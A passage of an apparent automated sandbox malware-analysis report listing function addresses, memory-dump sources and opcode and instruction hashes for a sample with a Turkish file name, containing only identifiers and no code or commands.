                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction Fuzzy Hash: 4DE0D832654185ABD73A3A598800B6A77A9DBD07A2F150469E6108B160EB70DC40D7D8
                                                                                                              Function 01BE678E Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction ID: 981adaa099261dceaae01316af8af338d00e2ad40b8ed765ef58eff4ad4a9cee
                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction Fuzzy Hash: 59E0DF32A40110BBDF269799CD05F9ABFACDBA4FA1F050095BA00E7090E770EE00D690
                                                                                                              Function 0040E461 Relevance: .0, Instructions: 24COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 56c62ff1eda09e1bdf6d44cc4d7fdc403d6bb65d3d6684610e16e318f6b2dfdd
                                                                                                              • Instruction ID: df5b5b946206354c393f7c52451566b8d0a2d0d04488327835fce837b35bb8f7
                                                                                                              • Opcode Fuzzy Hash: 56c62ff1eda09e1bdf6d44cc4d7fdc403d6bb65d3d6684610e16e318f6b2dfdd
                                                                                                              • Instruction Fuzzy Hash: 6FD0C25AB8A05195861A9A1D6CA08A1E72984C3670B1023E8DC98DB781D311C02182B9
                                                                                                              Function 01B425E0 Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8e3a7f47fa512e9a78e455d2b3becf8ab09be888d18b0f9bfad627d5bfd9efeb
                                                                                                              • Instruction ID: b04da339436a6539c754d4ac2115af3cc098d2bfd6cebe510323a10ce8895b49
                                                                                                              • Opcode Fuzzy Hash: 8e3a7f47fa512e9a78e455d2b3becf8ab09be888d18b0f9bfad627d5bfd9efeb
                                                                                                              • Instruction Fuzzy Hash: 9EE09232100654ABCB26BF29DD01F8A77EAEF607A0F014555B115571A0CB30A910D794
                                                                                                              Function 01BFA456 Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction ID: edd0d375024a4b70f014865a29119b13600ed9ea9457415e520f205c1ae40889
                                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction Fuzzy Hash: 4EE09231010612DFEB3E6F3AC908B56BBE0FF50B11F148CADA19A025B0C77598C4CB40
                                                                                                              Function 01BC4000 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction ID: dac8697af0f17600eddb428e212fa6726bf58e8128d9cd583ac148e6fb205996
                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction Fuzzy Hash: DAE0C2343403058FE719CF19C050B627BB6FFD9A10F28C0A8A9488F205EB32E942CB40
                                                                                                              Function 01B7CA38 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: df99fd37b3cb00d8f4df1e8ce5ac3a1e3116af594855c8c94f362370b0c6dd60
                                                                                                              • Instruction ID: 3b92e9d72bb72667845c8119f61faddc70ed45eb0efb6e782296a9ce4f3bc706
                                                                                                              • Opcode Fuzzy Hash: df99fd37b3cb00d8f4df1e8ce5ac3a1e3116af594855c8c94f362370b0c6dd60
                                                                                                              • Instruction Fuzzy Hash: 05D02B324810626ACF7EF2197C04F933E5DDB50321F0148E4F51992014D765CC8197C4
                                                                                                              Function 01B3823B Relevance: .0, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction ID: 809eb2ec5f99fc549d8f0d48b82a2041605494168bc2848bbf36892508bdb0d9
                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction Fuzzy Hash: 88E08C31041A10EFDF3A2F25DD00F5176E1FB94B50F214AE9F085460A487B4A892CA45
                                                                                                              Function 01B42050 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f1d448d5108ef4a386e616a371e0fd979a8d0495776eb7853e19eb66cf667e44
                                                                                                              • Instruction ID: b78c149b0021657920abdde6d4808ffed384bbfb67cdc35e6c26f2f7e68073ea
                                                                                                              • Opcode Fuzzy Hash: f1d448d5108ef4a386e616a371e0fd979a8d0495776eb7853e19eb66cf667e44
                                                                                                              • Instruction Fuzzy Hash: 03E08C321005606BCB16FB5DED00F4A73AAEFA42A0F004161B151872A0CB30AD00E7A4
                                                                                                              Function 01B78A90 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction ID: dedc2acf0fd73581a7b81848eaf17a9459d8b8cfe0f202022c744400612d90af
                                                                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction Fuzzy Hash: 32E08633511A1487C728EE18D515B7277A4EF45720F09463EA62347790C634E544C794
                                                                                                              Function 01B96AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                              • Instruction ID: 4b18fe569ffd0084204b606badf32b46024f8c41dff23ad67741b82241e92b4c
                                                                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                              • Instruction Fuzzy Hash: 81D05E36511A50AFC7369F1BEA00D13BBF9FBC5B50705067EA54583A20C774A806CBA0
                                                                                                              Function 01B7E59C Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction ID: 1c3daa6bbbab952d4d9ce00c5850050e01ceeb8b0fa2c9df2c47d041fcfef2f5
                                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction Fuzzy Hash: A0D0A932604620ABDB76AA1CFC00FD333E8BB88760F060499B108C7260C3A0AC81CA84
                                                                                                              Function 01BBE908 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction ID: a7f649b256ee07826bb37314d7b814442cbc1c79fc65d8d3abbd38c679fb4913
                                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction Fuzzy Hash: F8E0EC359507849BDF5ADF59C680F9ABBF5FB94B40F150094A5485B670C774E900CB40
                                                                                                              Function 01B3A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction ID: b8cfc745b8e94803bd9c1326c1336b8e985e13e2f61e6a2f6cdc70e28b3c67b9
                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction Fuzzy Hash: 2BD0223221203093CF2C97666800F63BA05EBC1AD0F2A01AC380AE3900C2148C42C2E0
                                                                                                              Function 01B7A830 Relevance: .0, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction ID: 08326afdcf7d94781228588b895dbb202a4de4e14c64ef6e647613eef2a5d9d7
                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction Fuzzy Hash: 56D012371D064DBBCB119F66DC01F957BA9E764BA0F444020B904875A0C63AE950D584
                                                                                                              Function 01B7CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9bb981cf1be7f4708736d29d0c55e00b73a7d4f5ea7a2f9ed2eb833130fdb026
                                                                                                              • Instruction ID: 9e922c95c3c4c5ce78d9dc5b9996a251bc2d16f5ef0f80d03385e6f166376832
                                                                                                              • Opcode Fuzzy Hash: 9bb981cf1be7f4708736d29d0c55e00b73a7d4f5ea7a2f9ed2eb833130fdb026
                                                                                                              • Instruction Fuzzy Hash: 44D052306019029BDF2FEB08CA51ABA3EB8EB20681B4000ECEA0192920E328DC018A10
                                                                                                              Function 01B502A0 Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction ID: 38cedfe3edd43bd3e2f68ac0f660b378efb5d8e36f8c56a4e886a96ab4e9ee9c
                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction Fuzzy Hash: 94D09235216E80CFD76A8B0CC5A4B1573A4FB44B84F8504D0E901CBB22E769D940CA00
                                                                                                              Function 01B7C700 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction ID: cadacc29b50c5a8759c001a74e1e98378189a661168be9952c0763390dcdb4ce
                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction Fuzzy Hash: 71C01232290648AFCB16AB99CD01F027BA9EBA8B80F000061F6048B670C631E820EA84
                                                                                                              Function 01B60310 Relevance: .0, Instructions: 11COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction ID: 1870e21cd622607ac4b17ec45d09cf705c9e0b2ab96def252f64b5bf2ee60483
                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction Fuzzy Hash: 40D01236100289EFCB05EF41C890D9A772AFBD8710F108019FD19076108A35ED62DA50
                                                                                                              Function 01B40750 Relevance: .0, Instructions: 9COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction ID: 1cc7f594c35ea8c8b20dc11cda417b8894c0cc7a25d946734e0989fbe502600d
                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction Fuzzy Hash: ECC00179601A828BCF1ADB2AD294B4977F4FB44780F1508E0E8468BB22E724E802CA10
                                                                                                              Function 01B84340 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7aa7368517afc0b83022106aa1a06886c74e1e78cc11a7d763f1a3950393a62d
                                                                                                              • Instruction ID: a123accae5727be1f6d7ebb800a4d5f790366d4059b48756f523cc70b7f38bbb
                                                                                                              • Opcode Fuzzy Hash: 7aa7368517afc0b83022106aa1a06886c74e1e78cc11a7d763f1a3950393a62d
                                                                                                              • Instruction Fuzzy Hash: BC900232605804129644715848845464005A7E1301B55C061E0428555CCB188A575365
                                                                                                              Function 01B84650 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 66fa8ed99d2940ded20c5092fab24d5dcc60a3991373c936af315a072d15aa2a
                                                                                                              • Instruction ID: fa151b64daef28b564b763e07b61efbd4f27f2b908a0bd7006a9a610f4ed8df8
                                                                                                              • Opcode Fuzzy Hash: 66fa8ed99d2940ded20c5092fab24d5dcc60a3991373c936af315a072d15aa2a
                                                                                                              • Instruction Fuzzy Hash: 51900262601504424644715848044066005A7E2301395C165A0558561CC71C8956936D
                                                                                                              Function 01B82BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 557ba6ea425347544d45a30991f7d4e9069a956743373f5faec69b971373e02e
                                                                                                              • Instruction ID: f9a6888a509798d4472ad5b40a4f0b74e678e1cd449868a7ad399a16efdc6f9c
                                                                                                              • Opcode Fuzzy Hash: 557ba6ea425347544d45a30991f7d4e9069a956743373f5faec69b971373e02e
                                                                                                              • Instruction Fuzzy Hash: F690023260540C02D65471584414746000597D1301F55C061A0028655DC7598B5677A5
                                                                                                              Function 01B82B80 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d252c1533a247a80722cd80a3d32cbc2feee99258ecd5bbfbde7a120592347b
                                                                                                              • Instruction ID: f1919efc6f8207adb8e50e79f907eab9e2ac659cce0d5c429f54ac982e2bb8cc
                                                                                                              • Opcode Fuzzy Hash: 0d252c1533a247a80722cd80a3d32cbc2feee99258ecd5bbfbde7a120592347b
                                                                                                              • Instruction Fuzzy Hash: 3B90023220140C02D60871584804686000597D1301F55C061A6028656ED76989927235
                                                                                                              Function 01B82BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 28689093e386552bca89242f8c0c9ddb0866c2d87f5e529b17c7a41310b0d816
                                                                                                              • Instruction ID: 16d7ef5396e3868c16320a4aafa88993aa4a2bb111898d5767bc52ac35e2189e
                                                                                                              • Opcode Fuzzy Hash: 28689093e386552bca89242f8c0c9ddb0866c2d87f5e529b17c7a41310b0d816
                                                                                                              • Instruction Fuzzy Hash: 8790023220544C42D64471584404A46001597D1305F55C061A0068695DD7298E56B765
                                                                                                              Function 01B82AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9ce19acf662e55cb8715bc6ab89b55a648688cf504b90105fcb71454f7e2b3b9
                                                                                                              • Instruction ID: afa0ec5593bdbe4a48c4aa8facbbfe7787b49884173934731df227155555ed34
                                                                                                              • Opcode Fuzzy Hash: 9ce19acf662e55cb8715bc6ab89b55a648688cf504b90105fcb71454f7e2b3b9
                                                                                                              • Instruction Fuzzy Hash: B99002A2201544924A04B2588404B0A450597E1201B55C066E1058561CC62989529239
                                                                                                              Function 01B82AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dc1f4c5b5b82f1c9c8afb01f26bd31e1864a6cb4fe733cd49d00cb428453492f
                                                                                                              • Instruction ID: b268de17fadd038b5712f429b9a0f63af9b6452d57f4aaade7d7ec3b8b5c0a45
                                                                                                              • Opcode Fuzzy Hash: dc1f4c5b5b82f1c9c8afb01f26bd31e1864a6cb4fe733cd49d00cb428453492f
                                                                                                              • Instruction Fuzzy Hash: DA900226221404020649B558060450B0445A7D7351395C065F141A591CC72589665325
                                                                                                              Function 01B82DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 17d3342950ab1281c6a4262008290c26ab76f954446c477ea761cd263f10cc05
                                                                                                              • Instruction ID: f54c0e5dc059cee4d71352f6637a3623c79f205f21a529bec0a57de7686573a9
                                                                                                              • Opcode Fuzzy Hash: 17d3342950ab1281c6a4262008290c26ab76f954446c477ea761cd263f10cc05
                                                                                                              • Instruction Fuzzy Hash: 2290023224140802D645715844046060009A7D1241F95C062A0428555EC7598B57AB65
                                                                                                              Function 01B82D00 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f7e31ad423f318432e36e0e53502c480cfba2160641dc051168c6ca8130c9318
                                                                                                              • Instruction ID: b898bff43b51415f9f9982c837427bd0ea0ee42f4d3768eabda89883537a7455
                                                                                                              • Opcode Fuzzy Hash: f7e31ad423f318432e36e0e53502c480cfba2160641dc051168c6ca8130c9318
                                                                                                              • Instruction Fuzzy Hash: 2490022220544842D60475585408A06000597D1205F55D061A1068596DC7398952A235
                                                                                                              Function 01B82CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1624146248.0000000001B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B10000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_1b10000_TEKL#U0130F #U0130ST.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0c0d6db14065e52c755447fe5641aa6ac24cc3b13c7fb8134cdd3bf9739beb0f
                                                                                                              • Instruction ID: 49800dabdf4ece57de218715155e40a58f18b46dd9283453be8b490e8a47eb1d
